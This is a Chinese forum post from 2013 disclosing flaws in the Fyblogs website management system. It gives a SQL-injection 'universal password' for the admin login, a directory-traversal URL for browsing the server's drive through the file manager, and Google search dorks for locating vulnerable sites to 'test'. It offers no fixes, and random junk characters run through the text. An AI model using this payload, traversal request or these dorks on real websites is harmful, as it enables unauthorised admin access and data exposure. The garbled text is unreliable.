漏洞类型: 未授权访问/权限绕过
1 Q# c/ p6 |3 g. V9 a( }+ R8 u6 q8 |
简要描述:7 |) v% `9 t- s) g3 _6 h
3 G! F$ e8 |* u; _( n& N9 R" v; g
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
" @/ K4 B+ `. }% Q# {/ Q9 p: s2 b
详细说明:1 s" G% G d8 @9 J G
0 W4 W, W3 F; H7 b% N后台万能密码 'or'='or'
V" e6 D7 I& A, I; I后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!7 [( r4 d- y7 Q# v; y
admin/uploadfile.asp?currentFolder=/upfiles/../
8 L4 Q# k/ a& U& H& I" b3 P, t- m6 c( |5 E) D- X2 k
漏洞证明:% S" S1 G9 x+ \
0 k3 y$ h0 L+ r/ a4 I! o1 s谷歌:inurl:type.asp?id=1 新闻中心
/ O" U& J% E) \" K6 J& |或者 :inurl:download_ok.asp?& P f, P2 v) e! v# r. h
' x; ^2 H, R, i' {可以测试
3 C4 W0 i9 X$ T( I6 Q- O, T' w" y1 v9 m5 o4 D( k2 ~# F
9 K" n) B4 [+ i( X+ T f& m& Y4 l
|
发表于 2013-3-7 13:07:46
收藏
分享
支持
反对